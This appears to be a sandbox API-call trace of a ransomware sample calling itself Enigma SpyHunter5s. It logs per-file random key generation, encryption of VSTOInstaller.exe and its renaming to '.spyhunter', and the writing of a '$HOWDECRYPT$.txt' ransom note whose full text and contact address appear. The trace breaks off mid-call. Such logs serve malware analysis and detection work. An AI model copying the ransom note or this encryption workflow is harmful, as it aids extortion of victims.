GetProcessHeap () returned 0x2c0000 [0092.497] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x383a88 | out: hHeap=0x2c0000) returned 1 [0092.497] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfd50 | out: pbBuffer=0x25cfd50) returned 1 [0092.497] GetProcessHeap () returned 0x2c0000 [0092.497] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0092.497] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x25cfd48*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x25cfd48*=0x30) returned 1 [0092.497] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\babypink.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\babypink.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.510] GetProcessHeap () returned 0x2c0000 [0092.510] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0092.510] GetProcessHeap () returned 0x2c0000 [0092.510] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x37e200 | out: hHeap=0x2c0000) returned 1 [0092.511] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\$HOWDECRYPT$.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\flippage\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xcc [0092.525] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0092.525] WriteFile (in: hFile=0xcc, lpBuffer=0x25cfc7f*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25cfda8, lpOverlapped=0x0 | out: lpBuffer=0x25cfc7f*, lpNumberOfBytesWritten=0x25cfda8*=0x127, lpOverlapped=0x0) returned 1 [0092.526] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0092.526] WriteFile (in: hFile=0xcc, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25cfda8, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25cfda8*=0x2ac, lpOverlapped=0x0) returned 1 [0092.526] CloseHandle (hObject=0xcc) returned 1 [0092.526] GetProcessHeap () returned 0x2c0000 [0092.526] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x346728 | out: hHeap=0x2c0000) returned 1 [0092.526] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfd48 | out: pbBuffer=0x25cfd48) returned 1 [0092.526] GetProcessHeap () returned 0x2c0000 [0092.526] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0092.526] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x25cfd40*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x25cfd40*=0x30) returned 1 [0092.527] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\1047x576black.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\flippage\\1047x576black.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.545] GetProcessHeap () returned 0x2c0000 [0092.545] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0092.545] GetProcessHeap () returned 0x2c0000 [0092.545] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x346c68 | out: hHeap=0x2c0000) returned 1 [0092.546] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfd40 | out: pbBuffer=0x25cfd40) returned 1 [0092.546] GetProcessHeap () returned 0x2c0000 [0092.546] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0092.546] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x25cfd38*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x25cfd38*=0x30) returned 1 [0092.546] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Heart_VideoInset.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\heart_videoinset.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.580] GetProcessHeap () returned 0x2c0000 [0092.580] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0092.580] GetProcessHeap () returned 0x2c0000 [0092.580] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x37e560 | out: hHeap=0x2c0000) returned 1 [0092.580] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\$HOWDECRYPT$.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\layeredtitles\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0092.582] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0092.582] WriteFile (in: hFile=0x17c, lpBuffer=0x25cfc73*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25cfd9c, lpOverlapped=0x0 | out: lpBuffer=0x25cfc73*, lpNumberOfBytesWritten=0x25cfd9c*=0x127, lpOverlapped=0x0) returned 1 [0092.583] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0092.583] WriteFile (in: hFile=0x17c, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25cfd9c, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25cfd9c*=0x2ac, lpOverlapped=0x0) returned 1 [0092.583] CloseHandle (hObject=0x17c) returned 1 [0092.583] GetProcessHeap () returned 0x2c0000 [0092.583] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x378390 | out: hHeap=0x2c0000) returned 1 [0092.583] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfd38 | out: pbBuffer=0x25cfd38) returned 1 [0092.583] GetProcessHeap () returned 0x2c0000 [0092.583] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0092.584] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x25cfd30*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x25cfd30*=0x30) returned 1 [0092.584] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\NavigationUp_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\layeredtitles\\navigationup_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.586] GetProcessHeap () returned 0x2c0000 [0092.586] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0092.586] GetProcessHeap () returned 0x2c0000 [0092.586] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x37b228 | out: hHeap=0x2c0000) returned 1 [0092.586] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfd38 | out: pbBuffer=0x25cfd38) returned 1 [0092.586] GetProcessHeap () returned 0x2c0000 [0092.586] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0092.586] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x25cfd30*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x25cfd30*=0x30) returned 1 [0092.586] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\NavigationUp_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\layeredtitles\\navigationup_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.589] GetProcessHeap () returned 0x2c0000 [0092.589] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0092.589] GetProcessHeap () returned 0x2c0000 [0092.589] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x381da8 | out: hHeap=0x2c0000) returned 1 [0092.589] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfd30 | out: pbBuffer=0x25cfd30) returned 1 [0092.589] GetProcessHeap () returned 0x2c0000 [0092.589] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0092.589] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x25cfd28*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x25cfd28*=0x30) returned 1 [0092.589] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\NavigationRight_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\layeredtitles\\navigationright_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.619] GetProcessHeap () returned 0x2c0000 [0092.619] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0092.620] GetProcessHeap () returned 0x2c0000 [0092.620] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x37b110 | out: hHeap=0x2c0000) returned 1 [0092.620] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfd30 | out: pbBuffer=0x25cfd30) returned 1 [0092.620] GetProcessHeap () returned 0x2c0000 [0092.620] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0092.620] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x25cfd28*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x25cfd28*=0x30) returned 1 [0092.620] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\NavigationUp_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\full\\navigationup_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.623] GetProcessHeap () returned 0x2c0000 [0092.623] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0092.623] GetProcessHeap () returned 0x2c0000 [0092.623] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35a260 | out: hHeap=0x2c0000) returned 1 [0092.624] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfd28 | out: pbBuffer=0x25cfd28) returned 1 [0092.624] GetProcessHeap () returned 0x2c0000 [0092.624] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0092.624] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x25cfd20*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x25cfd20*=0x30) returned 1 [0092.624] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\NavigationRight_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\full\\navigationright_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.625] GetProcessHeap () returned 0x2c0000 [0092.625] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0092.625] GetProcessHeap () returned 0x2c0000 [0092.626] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x355698 | out: hHeap=0x2c0000) returned 1 [0092.626] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfd28 | out: pbBuffer=0x25cfd28) returned 1 [0092.626] GetProcessHeap () returned 0x2c0000 [0092.626] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0092.626] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x25cfd20*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x25cfd20*=0x30) returned 1 [0092.626] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\NavigationLeft_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\full\\navigationleft_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.626] GetProcessHeap () returned 0x2c0000 [0092.626] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0092.626] GetProcessHeap () returned 0x2c0000 [0092.626] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3555a0 | out: hHeap=0x2c0000) returned 1 [0092.626] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfd20 | out: pbBuffer=0x25cfd20) returned 1 [0092.626] GetProcessHeap () returned 0x2c0000 [0092.626] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0092.626] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x25cfd18*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x25cfd18*=0x30) returned 1 [0092.626] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\full.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\full\\full.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.626] GetProcessHeap () returned 0x2c0000 [0092.626] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0092.627] GetProcessHeap () returned 0x2c0000 [0092.627] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d8d8 | out: hHeap=0x2c0000) returned 1 [0092.627] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfd20 | out: pbBuffer=0x25cfd20) returned 1 [0092.627] GetProcessHeap () returned 0x2c0000 [0092.627] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0092.627] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x25cfd18*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x25cfd18*=0x30) returned 1 [0092.627] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\dotslightoverlay.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\full\\dotslightoverlay.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.628] GetProcessHeap () returned 0x2c0000 [0092.629] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0092.629] GetProcessHeap () returned 0x2c0000 [0092.629] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x346d48 | out: hHeap=0x2c0000) returned 1 [0092.629] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfd18 | out: pbBuffer=0x25cfd18) returned 1 [0092.629] GetProcessHeap () returned 0x2c0000 [0092.629] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0092.629] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x25cfd10*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x25cfd10*=0x30) returned 1 [0092.629] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\15x15dot.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\full\\15x15dot.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.631] GetProcessHeap () returned 0x2c0000 [0092.631] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0092.631] GetProcessHeap () returned 0x2c0000 [0092.631] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x358d60 | out: hHeap=0x2c0000) returned 1 [0092.631] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfd18 | out: pbBuffer=0x25cfd18) returned 1 [0092.631] GetProcessHeap () returned 0x2c0000 [0092.631] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0092.631] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x25cfd10*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x25cfd10*=0x30) returned 1 [0092.631] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOInstaller.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\vstoinstaller.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0092.689] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOInstaller.exe") returned 78 [0092.689] StrStrW (lpFirst="VSTOInstaller.exe", lpSrch=".txt") returned 0x0 [0092.689] GetProcessHeap () returned 0x2c0000 [0092.689] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c26128 [0092.689] ReadFile (in: hFile=0x16c, lpBuffer=0x2c26128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cfcd4, lpOverlapped=0x0 | out: lpBuffer=0x2c26128*, lpNumberOfBytesRead=0x25cfcd4*=0x2800, lpOverlapped=0x0) returned 1 [0092.783] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.783] WriteFile (in: hFile=0x16c, lpBuffer=0x2c26128*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cfcd4, lpOverlapped=0x0 | out: lpBuffer=0x2c26128*, lpNumberOfBytesWritten=0x25cfcd4*=0x2800, lpOverlapped=0x0) returned 1 [0092.783] GetProcessHeap () returned 0x2c0000 [0092.783] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c26128 | out: hHeap=0x2c0000) returned 1 [0092.785] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.785] WriteFile (in: hFile=0x16c, lpBuffer=0x25cfd14*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cfcd4, lpOverlapped=0x0 | out: lpBuffer=0x25cfd14*, lpNumberOfBytesWritten=0x25cfcd4*=0x4, lpOverlapped=0x0) returned 1 [0092.789] WriteFile (in: hFile=0x16c, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cfcd4, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x25cfcd4*=0x30, lpOverlapped=0x0) returned 1 [0092.789] CloseHandle (hObject=0x16c) returned 1 [0092.790] GetProcessHeap () returned 0x2c0000 [0092.790] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c21098 [0092.790] wnsprintfW (in: pszDest=0x2c21098, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOInstaller.exe.spyhunter") returned 88 [0092.790] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOInstaller.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\vstoinstaller.exe"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOInstaller.exe.spyhunter" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\vstoinstaller.exe.spyhunter")) returned 1 [0092.791] GetProcessHeap () returned 0x2c0000 [0092.791] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c21098 | out: hHeap=0x2c0000) returned 1 [0092.791] GetProcessHeap () returned 0x2c0000 [0092.791] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0092.791] GetProcessHeap () returned 0x2c0000 [0092.791] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x377f08 | out: hHeap=0x2c0000) returned 1 [0092.791] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfd10 | out: pbBuffer=0x25cfd10) returned 1 [0092.791] GetProcessHeap () returned 0x2c0000 [0092.791] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0092.791] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x25cfd08*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x25cfd08*=0x30) returned 1 [0092.791] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Perf_Scenes_Subpicture1.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\perf_scenes_subpicture1.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.792] GetProcessHeap () returned 0x2c0000 [0092.792] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0092.792] GetProcessHeap () returned 0x2c0000 [0092.792] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x355790 | out: hHeap=0x2c0000) returned 1 [0092.792] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfd10 | out: pbBuffer=0x25cfd10) returned 1 [0092.792] GetProcessHeap () returned 0x2c0000 [0092.792] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0092.792] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x25cfd08*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x25cfd08*=0x30) returned 1 [0092.792] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Perf_Scenes_Mask1.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\perf_scenes_mask1.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, 